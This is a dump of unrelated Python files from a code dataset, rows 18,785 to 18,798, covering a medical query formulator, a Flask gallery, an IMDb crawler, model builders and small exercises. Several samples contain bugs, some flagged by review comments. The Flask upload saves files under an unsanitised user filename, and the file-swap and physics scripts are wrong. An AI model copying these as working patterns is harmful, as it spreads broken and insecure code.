                  'pain.n.02', 'pain.n.01', 'disease.n.01',
                  'condition.n.01', 'organ.n.01', 'symptom.n.01',
                  'liquid_body_substance.n.01', 'bodily_property.n.01',
                  'tumor.n.01'])
# Question-specific words excluded from queries on top of NLTK's stop words.
custom_stop_words = ["few", "little", "much", "more", "cause", "symptom", "treatment", "prevent"]
wn_stop_words = set(stopwords.words('english'))
wn_stop_words.update(custom_stop_words)
class QueryFormulator:
    """
    Prepare the queries for the DocumentRetriever
    Look for direct related query keywords
    If sense is not found
    Then use focus word as query
    """
    def __init__(self, q_classifer):
        # Classifier supplies the question tokens and regex match groups.
        self.q_classifer = q_classifer
        self.stop_words = wn_stop_words
        # token -> medically relevant WordNet sense (see find_senses)
        self.senses = self.find_senses(self.q_classifer.tokens)
        # keyword set handed to the retriever (see find_queries)
        self.queries = self.find_queries(self.senses)

    def find_queries(self, senses):
        """
        If the words match the senses
        Add to the queries list
        If no senses, use focus word as query
        :param senses:
        :return list: the query that will be used for PassageRetriever. Sample: {'cancer', 'aspirin'}
        """
        queries = set()
        for token in senses:
            queries.add(token)
        if (len(queries) == 0):
            # Fallback: use the classifier's non-stopword focus words.
            focus = self.q_classifer.matched_groups['focus'].split()
            focus = [f for f in focus if f not in set(stopwords.words('english'))]
            queries = focus
        return queries

    def find_senses(self, tokens):
        """ Get all the senses of word and hypernym
        :return dict: senses {'aspirin': 'medicine.n.02', 'cancer': 'tumor.n.01'}
        """
        senses = dict()
        for token in tokens:
            senses_tmp = set()
            if token not in self.stop_words:
                w_syns = wordnet.synsets(token)
                senses_tmp.update(self.find_hypernyms(w_syns))
            # Keep only senses present in the curated medical whitelist.
            for sense in senses_tmp:
                if sense in wn_senses:
                    senses.update({token: sense})
        return senses

    def find_hypernyms(self, syns):
        """
        Loop through hypernyms tree and find senses
        (collects direct hypernyms plus one more level up)
        :param syns:
        :return:
        """
        names = set()
        # Find hypernyms of each syn
        for syn in syns:
            hypernyms = syn.hypernyms()
            # find hypernyms one more level up
            for hypernym in hypernyms:
                names.add(hypernym.name())
                hypernyms_second = hypernym.hypernyms()
                for h in hypernyms_second:
                    names.add(h.name())
        return names
if __name__ == "__main__":
"""
For testing purpose
This file require QuestionClassifier
Run this file to see details as described below
"""
from question_classifier import QuestionClassifier
questions = [
"Who do I contact if I have coronavirus?"
# "what are the treatment for hay fever",
# "treatment for hay fever",
# "what are the symptoms of hay fever",
# "what is hay fever",
# "what cause depression",
# "how many times do i take aspirin in a day",
# "where does acne occur most",
# "where do i go to take vaccine for hay fever",
# "why do i have hay fever",
# "who do i contact if i have hay fever",
# "is aspirin lethal",
# "Can ADHD cause depression",
# "what do i do if i have fever",
# "What happens during a diagnosis of adult ADHD?"
]
for q_ in questions:
print("=======================")
print(q_)
q_classifier = QuestionClassifier(q_)
q = QueryFormulator(q_classifier)
print("Senses:", q.senses) # {'aspirin': 'medicine.n.02', 'cancer': 'tumor.n.01'}
print("Queries:", q.queries) # {'cancer', 'aspirin'}
|
18,785 | 33a7c93abb29dd5e7ea81778b396365f75fdf18c | _base_ = [
'../_base_/models/pointpillars_hv_secfpn_waymo.py',
'../_base_/datasets/waymoD5-3d-3class.py',
'../_base_/schedules/schedule-2x.py',
'../_base_/default_runtime.py',
]
|
18,786 | 1336594f7c1b6145d8a21f761e8748694d0cdaa8 | task=[]
status=[]
# Collect a task and a status for each of the requested entries, echoing
# the growing lists after every input.
user=int(input("enter the how many task : "))
i=0
while i<user:
    t=input("enter the task : ")
    task.append(t)
    print(task)
    s=input("enter the status : ")
    status.append(s)
    print(status)
    i=i+1
# Print the task/status pairs side by side.
# NOTE(review): the first p=len(task) is immediately overwritten by
# p=len(status); the code assumes both lists stay the same length.
c=0
p=len(task)
p=len(status)
while c<p:
    print(task[c],"=",status[c])
    c=c+1
user=input("what you want to do ? ")
if user=="add":
    task1=input("enter tha task u want to do : ")
    status2=input("enter the statu u want to do : ")
    task.append(task1)
    status.append(status2)
    c=0
    p=len(task)
    p=len(status)
    while c<p:
        print(task[c],"=",status[c])
        c=c+1
    user1=input("what you want to do ? ")
    if user1=="remove":
        task3=input("enter the task : ")
        status4=input("enter the status : ")
        task.remove(task3)
        status.remove(status4)
        c=0
        p=len(task)
        p=len(status)
        while c<p:
            print(task[c],"=",status[c])
            c=c+1
        user=input("enter that what you want to do ? ")
        if user=="eadit":
            # NOTE(review): appends a status without a matching task, so the
            # two lists drift out of sync after an "eadit" operation.
            status5=input("enter the status : ")
            status.append(status5)
            print(status[c])
            c=c+1
|
18,787 | 3726fb6e976a18abd6f4eb283016ca8553854de5 | #! /usr/bin/python
# -*- coding: utf-8 -*-
__author__ = ("Onur Kuru", "Osman Baskaya")
__date__ ="$Sep 20, 2011 00:43:16 AM$"
""" Movie Recommendation Systems """
from sys import stderr
try:
from imdb import IMDb
except ImportError:
stderr.write("imdbpy module does not exist " +
"please make sure this module installed correctly.\n")
exit(1)
from os import remove, path
from pickle import dump
import cProfile
# Seed people and genres for the crawl.
persons = ['Steven Spielberg','Ridley Scott','Robert De Niro',
        'Robin Williams', 'Mel Gibson','Jim Carrey']
genres = ['comedy','history','sci-fi','drama','thriller','fantasy', 'western']
# our algorithm needs these in reversed order.
persons.reverse()
genres.reverse()
# movieID -> [movieID, title, person, genre]; pickled to hash_dump.txt
# at the end of main().
hash_table = dict()
ia = IMDb()
def remove_old_files(filelist):
    """Delete each existing file in *filelist*; abort the program on failure.

    This helps to remove stale artifacts like the db and hash dump before
    a fresh crawl.
    """
    for filename in filelist:
        if path.exists(filename):
            try:
                remove(filename)
                print("%s deleted" % filename)  # FIX: Py3 print function
            except OSError:  # FIX: narrowed per the original TODO
                stderr.write("%s cannot remove. Please check your priviledge\n"
                             % filename)
                exit(1)
# Start each run from a clean slate.
remove_old_files(('db.txt', 'hash_dump.txt'))
#def fetch_movies(person, genre):
    #print "processing %s, %s" % (person, genre)
    #movies = get_movies(person, genre)
    #return movies
def get_movies(imdb_person, genre):
    """Yield one list of [movieID, title, person name, genre] rows for the
    given person/genre pair; yields nothing if the person has no such works.
    """
    print("processing %s, %s" % (imdb_person, genre))  # FIX: Py3 print
    try:
        all_work = imdb_person['genres'][genre]
    except KeyError:
        stderr.write("%s has no movie for %s\n" % (imdb_person, genre))
    else:
        # FIX: try/else replaces the any_error flag of the original.
        movies = [[work.movieID, work.data['title'].encode('utf-8'),
                   imdb_person['name'].encode('utf-8'), genre]
                  for work in all_work if work['kind'] == u'movie']
        yield movies
def update_hash(movies):
    """Index each movie row by its movieID in the module-level hash_table."""
    hash_table.update({row[0]: row for row in movies})
def search_update_person(person):
    """Look up *person* on IMDb, fetch their genre/link data, and return
    the populated person object."""
    imdb_person = ia.search_person(person, results=2)[0]
    ia.update(imdb_person, info='genres links')
    print("%s updated" % person)  # FIX: Py3 print function
    return imdb_person
def write_movies_to_db(movies):
    """Append one comma-joined line per movie row to db.txt.

    Each row is [movieID, title, person, genre]. No quoting/escaping is
    performed, so embedded commas in titles would corrupt the file.
    """
    # context manager guarantees the handle is closed even if a write fails
    with open('db.txt', 'a') as db_file:
        for movie in movies:
            db_file.write(','.join(movie) + '\n')
def main():
    """Crawl every (person, genre) pair, append rows to db.txt and
    pickle the id -> movie hash table to hash_dump.txt.
    """
    for person in persons:
        imdb_person = search_update_person(person)
        for genre in genres:
            for movies in get_movies(imdb_person, genre):
                if movies:
                    write_movies_to_db(movies)
                    update_hash(movies)
    # binary mode + context manager: pickle data is not text, and the
    # original left the file handle open
    with open('hash_dump.txt', 'wb') as dump_file:
        dump(hash_table, dump_file)
if __name__ == '__main__':
    cProfile.run('main()')  # profile the whole crawl run
|
18,788 | 777e203473355db8f31d6ee11d752c2704b542ef | #Author: Spencer Dant
#Python Programming
#7/28/2018
#Exchanging two files
import os
#This is the cheating way to do it
def cheating(data1, data2):
    """Swap two files (given as paths) by renaming them through a temporary name."""
    parked = 'temp'
    os.rename(data2, parked)    # park the second file out of the way
    os.rename(data1, data2)     # first file takes the second's name
    os.rename(parked, data1)    # parked file takes the first's name
#This creates a temperary file to store the first file
#for copying
def copying(data1, data2):
    """Swap the contents of two open text files, using temp.txt as scratch.

    Both arguments must be file objects opened in a read/write mode
    (e.g. 'r+'). The scratch file temp.txt is left behind afterwards,
    matching the original behaviour.

    Fixes vs. the original: temp.txt is created with 'w+' ('r+' raised
    when it did not exist), the files are rewound and truncated before
    each copy (nothing was actually swapped before), and close() is
    actually called (the bare `.close` attribute access did nothing).
    """
    temp_file = open("temp.txt", 'w+')
    # first -> temp
    data1.seek(0)
    for line_str in data1:
        temp_file.write(line_str)
    # second -> first (read fully before truncating the target)
    data2.seek(0)
    second_lines = data2.readlines()
    data1.seek(0)
    data1.truncate()
    for line_str in second_lines:
        data1.write(line_str)
    # temp -> second
    temp_file.seek(0)
    data2.seek(0)
    data2.truncate()
    for line_str in temp_file:
        data2.write(line_str)
    data1.flush()
    data2.flush()
    temp_file.close()
#inputs with exception handling
file1 = input("Enter name for first file: ")
try:
    data_file1 = open (file1, 'r+')
except FileNotFoundError:
    # NOTE(review): execution continues after this message, so
    # data_file1 stays undefined and the calls below raise NameError
    print("The file", file1, "Does not exsist")
file2 = input("Enter name for second file: ")
try:
    data_file2 = open(file2, 'r+')
except FileNotFoundError:
    print("The file", file2, "Does not exsist")
#calls cheating function
# NOTE(review): cheating() renames by path but receives open file
# objects here -- os.rename will raise TypeError; pass file1/file2 instead
cheating(data_file1,data_file2)
#calls copying function
copying(data_file1,data_file2)
#closes files
# NOTE(review): missing () -- these access the close method without calling it
data_file1.close
data_file2.close
|
18,789 | 8cbade59da25745c26ea476348e6dee505e1dc97 | from collections import *
from itertools import *
from random import *
from time import *
def main():
    """Print the sum of all multiples of 3 or 5 below 1000 (Project Euler #1)."""
    total = sum(i for i in range(1000) if i % 3 == 0 or i % 5 == 0)
    print(total)
# time the solution (time() comes from the wildcard `from time import *`)
start = time()
main()
print('Program took %.02f seconds' % (time()-start))
18,790 | 395c516e65077dea222c7f877e3a9729d925c267 | from django.db import models
from django.urls import reverse
from authentication.models import User
class Application(models.Model):
    """A registered client application that reports errors."""
    name = models.CharField(max_length=32)
    # opaque credential presented by the application when reporting errors
    token = models.CharField(max_length=128)
    author = models.ForeignKey(User, on_delete=models.CASCADE)
    def __str__(self):
        """Human-readable name shown in the admin and shell."""
        return self.name
    def get_absolute_url(self):
        """Canonical detail URL for this application."""
        return reverse('app-detail', args=[self.pk])
class Error(models.Model):
    """One error event reported by an Application."""
    # deleting an Application cascades to its errors; reverse accessor app.errors
    app = models.ForeignKey(Application, on_delete=models.CASCADE, related_name='errors')
    # timestamp of the error; presumably set by the reporter -- confirm against callers
    date = models.DateTimeField()
    type = models.CharField(max_length=128)
    message = models.TextField()
    stacktrace = models.TextField()
    def __str__(self):
        """e.g. 'ValueError,2020-01-01 00:00:00+00:00'."""
        return '{},{}'.format(self.type, self.date)
|
18,791 | dc0f6b9198e2a6c6148ffd604579e905c7f35eb0 | from matplotlib import pyplot as plt
# Flat line: kinetic energy is independent of light intensity
# (photoelectric-effect demonstration plot).
x = [1,2,3,4]
y = [3,3,3,3]
plt.plot(x,y)
plt.title('Light Intensity vs. Kinetic Energy ')
plt.ylabel('Kinetic Energy')
plt.xlabel('Light Intensity')
plt.show()
# NOTE(review): the printed text says 6.6^10-34 but the code below uses
# 6.624e-34 J*s -- the message is misleading
print("plancks constant =6.6^10-34")
h =6.624*10**-34
c=3*10**8
print("enter frequency ")
f=float(input())
#print("enter kinetic energy")
#k=float(input())
#print("enter wavelength in nm")
#l=float(input())
print("enter mass of body")
m=int(input())
print("enter velocity of paerticle")
v=int(input())
# work function W = h*f - KE; the leading minus flips the sign --
# NOTE(review): verify the intended sign convention
w=-(h*f-0.5*m*v*v)
#w=-((h*c)/(l*10**-9)-k)
# NOTE(review): w is computed in joules but labelled "ev" -- confirm units
print("work function =",w,"ev")
tf=(w*1.6*10**-19)/h
print("threshold frequency=",tf,"Hz")
18,792 | 612fb8f0ed07bfdb5a6fdcfb4fae3724ebf81686 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
import smallsmilhandler
import urllib.request
import json
from xml.sax import make_parser
class Karaokelocal:
    """Parse a SMIL file and offer JSON export plus localisation of remote media."""

    def __init__(self, fichero):
        """Parse *fichero* (a SMIL file path) and store its tag list.

        Exits with an error message if the file does not exist.
        """
        try:
            parser = make_parser()
            cHandler = smallsmilhandler.SmallSMILHandler()
            parser.setContentHandler(cHandler)
            # use the argument instead of re-reading sys.argv[1]
            # (the parameter was previously ignored -- a bug)
            parser.parse(open(fichero))
            self.lista = cHandler.get_tags()
        except FileNotFoundError:
            sys.exit('file not found')

    def __str__(self):
        """Return one line per tag: tab-separated attribute='value' pairs.

        Empty attribute values are omitted.
        """
        line = ''
        for linea in self.lista:
            for atributo in linea:
                if linea[atributo] != "":
                    line += atributo + "=" + "'" + linea[atributo] + "'" + '\t'
            line += '\n'
        return line

    def to_json(self, smil):
        """Dump the tag list as JSON next to *smil*, swapping .smil for .json."""
        ficherojs = smil.replace('.smil', '.json')
        with open(ficherojs, 'w') as filejson:
            json.dump(self.lista, filejson, indent=4)

    def do_local(self):
        """Download remote (http://) resources and rewrite attributes to local names."""
        for linea in self.lista:
            for atributo in linea:
                if linea[atributo][0:7] == 'http://':
                    direction = linea[atributo].split('/')[-1]
                    # save under the local name we record below
                    # (previously downloaded to a temp file, so the
                    # recorded local file never existed -- a bug)
                    urllib.request.urlretrieve(linea[atributo], direction)
                    linea[atributo] = direction
if __name__ == "__main__":
"""
Programa principal
"""
try:
fichero = sys.argv[1]
karaoke = Karaokelocal(fichero)
except():
sys.exit('usage error: python3 karaoke.py file smil')
print(karaoke)
karaoke.to_json(fichero)
karaoke.do_local()
karaoke.to_json('local.smil')
print(karaoke)
|
18,793 | 76ead94a4a50d3c0ccdcb288e5960181cd9491ee | a = 'spartacodingclub@naver.com'
def find_email(e):
return e.split('@')[1].split('.')[0]
print(find_email(a))
|
18,794 | 8e5afe7677f5e1fbe47d7abdfc017a20a88b8c61 | from datetime import datetime
import os
from flask import request, render_template, redirect, Blueprint,session
from member import GalleryService, Gallery
# single service instance shared by every request handler below
service = GalleryService()
bp = Blueprint('gallery', __name__, url_prefix='/gallery')
@bp.route('/list')
def list():
    """Render every gallery entry."""
    # NOTE(review): shadows builtin list(); renaming would change the
    # endpoint name used by url_for('gallery.list'), so it is left as-is
    glist = service.getAll()
    return render_template('gallery/list.html', glist=glist)
@bp.route('/add')
def addForm():
    """Render the empty upload form (GET companion of upload())."""
    return render_template('gallery/form.html')
@bp.route('/add', methods=['POST'])
def upload():
    """Create a gallery entry from the posted form and save its image."""
    title = request.form['gall_title']
    writer = request.form['gall_writer']
    content = request.form['gall_content']
    upload_path = 'static/img/'
    f = request.files['gall_img']
    # NOTE(review): f.filename is attacker-controlled; consider
    # werkzeug.utils.secure_filename() before joining it into a path
    fname = upload_path+f.filename #f.filename : name of the uploaded file
    f.save(fname)
    # prepend '/' so templates can use the value as an absolute URL
    fname = '/' + fname
    service.addBoard(Gallery(gall_writer=writer, gall_title=title, gall_content=content, gall_img=fname))
    return redirect('/gallery/list')
# num = g.gall_num
# dir = 'static/img/' + str(num) + '/'
# os.mkdir(dir) # 이미지를 담을 디렉토리 생성
# f = []
# f.append(request.files['gall_img'])
# print(f)
# names= [] #업로드 파일의 새 이름
# for i in f:
# arr = f[i].filename.split('.')
# fileExtent = arr[len(arr)-1]
# fname = dir+'p_'+str(i+1)+'.'+fileExtent
# f[i].save(fname)
# names.append('/'+fname)
@bp.route('/detail/<int:gall_num>')
def detail(gall_num):
    """Show one gallery entry; the owner gets an editable view."""
    g = service.getBoard(gall_num)
    # session.get avoids a KeyError for anonymous visitors
    if g.gall_writer == session.get('login_id'):
        flag = True
        msg = ''
    else:
        flag = False
        msg = 'readonly'
    # flag/msg were previously computed but never passed to the template (bug)
    return render_template('gallery/detail.html', g=g, flag=flag, msg=msg)
# @bp.route('/getbywriter/<string:gall_writer>')
# def detail(gall_writer):
# glist = service.getByWriter(gall_writer)
# return render_template('gallery/list.html', glist=glist)
# @bp.route('/getbytitle/<string:gall_title>')
# def detail(gall_title):
# glist = service.getByTitle(gall_title)
# return render_template('gallery/list.html', glist=glist)
@bp.route('/edit/<int:gall_num>')
def editPage(gall_num):
    """Render the edit form pre-filled with the selected entry."""
    g = service.getBoard(gall_num)
    return render_template('gallery/edit.html', g=g)
@bp.route('/edit', methods=['POST'])
def edit():
    """Apply an edit-form submission, then return to the list page."""
    num = request.form['gall_num']
    title = request.form['gall_title']
    content = request.form['gall_content']
    date = datetime.now()
    service.editBoard(Gallery(gall_num=num, gall_date=date, gall_title=title, gall_content=content))
    print("### route:", num,date,title,content)
    # previously rendered list.html without its `glist` context and left
    # an unreachable redirect after the return; redirect is the intended
    # behaviour (see the commented-out variant below in the file)
    return redirect('/gallery/list')
# @bp.route('/edit', methods=['POST'])
# def edit():
# num = request.form['gall_num']
# title = request.form['gall_title']
# content = request.form['gall_content']
# date = datetime.now()
# # service.editBoard(Gallery(gall_num=num, gall_date=date, gall_title=title, gall_content=content))
# service.editBoard(num, date, title, content)
# print("### route:", num,date,title,content)
# return redirect('/gallery/list')
@bp.route('/editDone', methods=['POST'])
def editDone():
    """Show the list page focused on the entry just edited.

    The route rule supplies no URL parameter, so the id must come from
    the posted form; the original signature required `gall_num` and
    therefore raised TypeError on every request.
    """
    gall_num = request.form['gall_num']
    g = service.getBoard(gall_num)
    return render_template('gallery/list.html', g=g)
@bp.route('/del', methods=['POST'])
def delGallery():
    """Delete the entry whose id is posted in the form, then relist."""
    # num = request.args.get('gall_num', default=0, type=int)
    # service.delBoard(num)
    # return redirect('/gallery/list')
    gall_num = request.form['gall_num']
    service.delBoard(gall_num)
    return redirect('/gallery/list')
# @bp.route('/list')
# def listPage():
# page = request.args.get('page', type=int, default=1)
# gallery_list = Gallery.query.order_by(Gallery.gall_num.desc())
# gallery_list = gallery_list.paginate(page, per_page=5)
# return render_template('gallery/list.html', gallery_list=gallery_list) |
18,795 | 36a41a7e4a9278e14844eeae03ffbd1a742d96c1 | import torch
from torch import nn
import numpy as np
import os
import yaml
from pytorch_pretrained_bert import BertModel
from transformers import XLNetModel
from src.aspect_category_model.recurrent_capsnet import RecurrentCapsuleNetwork
from src.aspect_category_model.bert_capsnet import BertCapsuleNetwork
from src.aspect_category_model.bert_all import BertCNNNetwork, BertFcNetwork
from src.aspect_category_model.xlnet_all import XlnetFcNetwork, XlnetCNNNetwork, XlnetCapsuleNetwork
def make_model(config):
    """Build the aspect-category model selected by the config.

    Dispatches on config['aspect_category_model']['type']:
    'recurrent_capsnet', any type containing 'bert', or any type
    containing 'xlnet'.

    Raises:
        ValueError: for an unrecognised model type (the original
        silently returned None, deferring the failure to the caller).
    """
    model_type = config['aspect_category_model']['type']
    if model_type == 'recurrent_capsnet':
        return make_recurrent_capsule_network(config)
    elif 'bert' in model_type:
        return make_bert_all_network(config)
    elif 'xlnet' in model_type:
        return make_xlnet_all_network(config)
    raise ValueError('unknown aspect_category_model type: %s' % model_type)
def make_xlnet_all_network(config):
    """Build one of the XLNet-based aspect-category models.

    Reads num_categories from <base_path>/log/log.yml and the model
    hyper-parameters from config['aspect_category_model'][<type>].
    Supported types: 'xlnet_fc', 'xlnet_cnn', 'xlnet_capsule'.
    """
    base_path = os.path.join(config['base_path'])
    log_path = os.path.join(base_path, 'log/log.yml')
    log = yaml.safe_load(open(log_path))
    model_type = config['aspect_category_model']['type']
    # narrow `config` to this model's own hyper-parameter section
    config = config['aspect_category_model'][model_type]
    # NOTE(review): hard-coded machine-specific checkpoint path
    xlnet_path = '/home/xuwd/data/xlnet_cased_L-12_H-768_A-12/'
    xlnet = XLNetModel.from_pretrained(xlnet_path)
    if model_type == 'xlnet_fc':
        model = XlnetFcNetwork(
            xlnet=xlnet,
            xlnet_size=config['xlnet_size'],
            dropout=config['dropout'],
            hidden_size=config['hidden_size'],
            num_categories=log['num_categories']
        )
    elif model_type == 'xlnet_cnn':
        model = XlnetCNNNetwork(
            xlnet=xlnet,
            xlnet_size=config['xlnet_size'],
            dropout=config['dropout'],
            cnn_size=config['cnn_size'],
            filter_size=config['filter_size'],
            filter_nums=config['filter_nums'],
            num_categories=log['num_categories']
        )
    elif model_type == 'xlnet_capsule':
        model = XlnetCapsuleNetwork(
            xlnet=xlnet,
            xlnet_size=config['xlnet_size'],
            capsule_size=config['capsule_size'],
            dropout=config['dropout'],
            num_categories=log['num_categories']
        )
    # NOTE(review): any other xlnet type leaves `model` unbound and raises
    # UnboundLocalError here -- confirm only the three types above are used
    return model
def make_bert_all_network(config):
    """Build one of the BERT-based aspect-category models.

    Reads num_categories from <base_path>/log/log.yml and the model
    hyper-parameters from config['aspect_category_model'][<type>].
    Supported types: 'bert_capsnet', 'bert_cnn', 'bert_fc'.
    """
    base_path = os.path.join(config['base_path'])
    log_path = os.path.join(base_path, 'log/log.yml')
    log = yaml.safe_load(open(log_path))
    model_type = config['aspect_category_model']['type']
    # narrow `config` to this model's own hyper-parameter section
    config = config['aspect_category_model'][model_type]
    # NOTE(review): hard-coded machine-specific checkpoint path
    bert_path = '/home/xuwd/data/bert-base-uncased/'
    bert = BertModel.from_pretrained(bert_path)
    if model_type == 'bert_capsnet':
        model = BertCapsuleNetwork(
            bert=bert,
            bert_size=config['bert_size'],
            capsule_size=config['capsule_size'],
            dropout=config['dropout'],
            num_categories=log['num_categories']
        )
        # only the capsule variant consumes the precomputed sentiment matrix
        model.load_sentiment(os.path.join(base_path, 'processed/sentiment_matrix1.npy'))
    elif model_type == 'bert_cnn':
        model = BertCNNNetwork(
            bert=bert,
            bert_size=config['bert_size'],
            dropout=config['dropout'],
            cnn_size=config['cnn_size'],
            filter_size=config['filter_size'],
            filter_nums=config['filter_nums'],
            num_categories=log['num_categories']
        )
    elif model_type == 'bert_fc':
        model = BertFcNetwork(
            bert=bert,
            bert_size=config['bert_size'],
            dropout=config['dropout'],
            cnn_size=config['cnn_size'],
            num_categories=log['num_categories']
        )
    # NOTE(review): any other bert type leaves `model` unbound and raises
    # UnboundLocalError here -- confirm only the three types above are used
    return model
'''
def make_model(config):
model_type = config['aspect_category_model']['type']
if model_type == 'recurrent_capsnet':
return make_recurrent_capsule_network(config)
elif model_type == 'bert_capsnet':
return make_bert_capsule_network(config)
elif 'bert' in model_type:
return make_bert_all_network(config)
def make_bert_all_network(config):
base_path = os.path.join(config['base_path'])
log_path = os.path.join(base_path, 'log/log.yml')
log = yaml.safe_load(open(log_path))
model_type = config['aspect_category_model']['type']
config = config['aspect_category_model'][model_type]
bert_path = '/home/xuwd/data/bert-base-uncased/'
bert = BertModel.from_pretrained(bert_path)
if model_type == 'bert_cnn':
model = BertCNNNetwork(
bert=bert,
bert_size=config['bert_size'],
dropout=config['dropout'],
cnn_size=config['cnn_size'],
filter_size=config['filter_size'],
filter_nums=config['filter_nums'],
num_categories=log['num_categories']
)
elif model_type == 'bert_fc':
model = BertFcNetwork(
bert=bert,
bert_size=config['bert_size'],
dropout=config['dropout'],
cnn_size=config['cnn_size'],
num_categories=log['num_categories']
)
return model
'''
def make_bert_fc_network(config):
    """Build a BertFcNetwork from config and the recorded category count.

    NOTE(review): appears superseded by make_bert_all_network -- confirm
    whether this entry point is still called anywhere.
    """
    base_path = os.path.join(config['base_path'])
    log_path = os.path.join(base_path, 'log/log.yml')
    log = yaml.safe_load(open(log_path))
    # narrow `config` to this model's own hyper-parameter section
    config = config['aspect_category_model'][config['aspect_category_model']['type']]
    # NOTE(review): hard-coded machine-specific checkpoint path
    bert_path = '/home/xuwd/data/bert-base-uncased/'
    bert = BertModel.from_pretrained(bert_path)
    model = BertFcNetwork(
        bert=bert,
        bert_size=config['bert_size'],
        dropout=config['dropout'],
        cnn_size=config['cnn_size'],
        num_categories=log['num_categories']
    )
    # model.load_sentiment(os.path.join(base_path, 'processed/sentiment_matrix.npy'))
    return model
def make_bert_cnn_network(config):
    """Build a BertCNNNetwork from config and the recorded category count.

    Removed leftover debug prints (`print(config)` / `print("hrere")`).
    NOTE(review): appears superseded by make_bert_all_network -- confirm
    whether this entry point is still called anywhere.
    """
    base_path = os.path.join(config['base_path'])
    log_path = os.path.join(base_path, 'log/log.yml')
    log = yaml.safe_load(open(log_path))
    # narrow `config` to this model's own hyper-parameter section
    config = config['aspect_category_model'][config['aspect_category_model']['type']]
    # NOTE(review): hard-coded machine-specific checkpoint path
    bert_path = '/home/xuwd/data/bert-base-uncased/'
    bert = BertModel.from_pretrained(bert_path)
    model = BertCNNNetwork(
        bert=bert,
        bert_size=config['bert_size'],
        dropout=config['dropout'],
        cnn_size=config['cnn_size'],
        filter_size=config['filter_size'],
        filter_nums=config['filter_nums'],
        num_categories=log['num_categories']
    )
    # model.load_sentiment(os.path.join(base_path, 'processed/sentiment_matrix.npy'))
    return model
def make_bert_capsule_network(config):
    """Build a BertCapsuleNetwork and load its sentiment matrix.

    NOTE(review): downloads/uses the hub name 'bert-base-uncased' rather
    than the local path used elsewhere in this file -- confirm intended.
    """
    base_path = os.path.join(config['base_path'])
    log_path = os.path.join(base_path, 'log/log.yml')
    log = yaml.safe_load(open(log_path))
    # narrow `config` to this model's own hyper-parameter section
    config = config['aspect_category_model'][config['aspect_category_model']['type']]
    bert = BertModel.from_pretrained('bert-base-uncased')
    model = BertCapsuleNetwork(
        bert=bert,
        bert_size=config['bert_size'],
        capsule_size=config['capsule_size'],
        dropout=config['dropout'],
        num_categories=log['num_categories']
    )
    model.load_sentiment(os.path.join(base_path, 'processed/sentiment_matrix.npy'))
    return model
def make_recurrent_capsule_network(config):
    """Build a RecurrentCapsuleNetwork with GloVe-initialised word embeddings."""
    embedding = make_embedding(config)
    base_path = os.path.join(config['base_path'])
    log_path = os.path.join(base_path, 'log/log.yml')
    log = yaml.safe_load(open(log_path))
    # narrow `config` to this model's own hyper-parameter section
    config = config['aspect_category_model'][config['aspect_category_model']['type']]
    # 8 aspect ids, embedded at the same width as words --
    # presumably the number of aspect categories; confirm against dataset
    aspect_embedding = nn.Embedding(num_embeddings=8, embedding_dim=config['embed_size'])
    model = RecurrentCapsuleNetwork(
        embedding=embedding,
        aspect_embedding=aspect_embedding,
        num_layers=config['num_layers'],
        bidirectional=config['bidirectional'],
        capsule_size=config['capsule_size'],
        dropout=config['dropout'],
        num_categories=log['num_categories']
    )
    model.load_sentiment(os.path.join(base_path, 'processed/sentiment_matrix.npy'))
    return model
def make_embedding(config):
    """Create a word-embedding layer initialised from precomputed GloVe vectors.

    Vocabulary size comes from <base_path>/log/log.yml; embedding width
    from the active model's config section.
    """
    base_path = os.path.join(config['base_path'])
    log_path = os.path.join(base_path, 'log/log.yml')
    log = yaml.safe_load(open(log_path))
    vocab_size = log['vocab_size']
    config = config['aspect_category_model'][config['aspect_category_model']['type']]
    embed_size = config['embed_size']
    embedding = nn.Embedding(num_embeddings=vocab_size, embedding_dim=embed_size)
    # processed/glove.npy is assumed to be (vocab_size, embed_size) -- TODO confirm
    glove = np.load(os.path.join(base_path, 'processed/glove.npy'))
    embedding.weight.data.copy_(torch.tensor(glove))
    return embedding
18,796 | 758370b185673f27d9b7660765deacdb145571b8 | ## Website:: Leetfree, Interviewbit
## Link:: https://www.interviewbit.com/problems/median-of-array/
## Topic:: Binary search
## Sub-topic::
## Difficulty:: Hard
## Approach::
## Time complexity:: O(log(M+N))
## Space complexity:: O(1)
## Notes::
## Bookmarked:: Yes
import bisect
class Solution:
    """Median of two sorted arrays in O(log(m+n)) via rank bisection."""
    def find_median(self, arr1, arr2, target):
        """Return the element of arr1 that can occupy overall rank `target`
        (0-based) in the merged order, or None if that rank falls in arr2.

        For arr1[mid], the set of merged ranks it may occupy is the
        interval [mid + pl, mid + pr], where pl/pr bracket the values in
        arr2 equal to arr1[mid].
        """
        lo, hi = 0, len(arr1)
        while lo < hi:
            mid = (lo + hi) // 2
            pl = bisect.bisect_left(arr2, arr1[mid])
            pr = bisect.bisect_right(arr2, arr1[mid])
            minn, maxn = mid + pl, mid + pr
            if minn <= target <= maxn:
                return arr1[mid]
            elif maxn < target:
                lo = mid + 1
            else:
                hi = mid
        # falls through -> implicit None: the rank-`target` element is in arr2
    def findMedianSortedArrays(self, A, B):
        """Return the median of the merged sorted arrays A and B.

        Odd total length -> middle element (as int); even -> mean of the
        two middle elements (as float). Each middle element is looked up
        in A first, then in B when find_median returns None.
        """
        la, lb = len(A), len(B)
        l = la + lb
        median1, median2 = 0, 0
        target = l // 2
        median1 = self.find_median(A, B, target)
        if median1 is None: median1 = self.find_median(B, A, target)
        if l % 2 == 1:
            return int(median1)
        median2 = self.find_median(A, B, target - 1)
        if median2 is None: median2 = self.find_median(B, A, target - 1)
        ans = (median1 + median2) / 2.
        # print('tw', median1, median2, ans)
        return ans
|
18,797 | 52413791e06d7415c17f244f5e230af021e8bef0 | import random
# Demonstration of the random module's basic generators (output varies per run).
print(random.random())             # float in [0.0, 1.0)
print(random.randint(0, 10))       # int in [0, 10], both ends inclusive
print(random.randrange(0, 10, 2))  # even int in [0, 10), step 2
print(random.uniform(1, 10))       # float between 1 and 10
print(random.gammavariate(15, 20)) # gamma-distributed float (alpha=15, beta=20)
18,798 | 1c7f4264e00e6706bebfcd8c80806ad73f02a21e | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 17 09:52:30 2021
@author: xochipilli
"""
#%%#############################################################################
# Dependencias
#!pip install torch==1.7.0+cu101 torchvision==0.8.1+cu101 torchaudio==0.7.0 -f https://download.pytorch.org/whl/torch_stable.html
import pandas as pd
import matplotlib.pyplot as plt
import time
# Dependencias
import sys
import os
import seaborn as sns
#%%#############################################################################
# Cosas para editar
## Donde correr
